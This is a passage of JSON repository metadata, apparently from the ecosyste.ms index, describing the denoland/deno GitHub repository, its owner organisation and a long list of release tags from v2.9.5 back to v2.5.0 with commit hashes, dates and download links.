vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denolan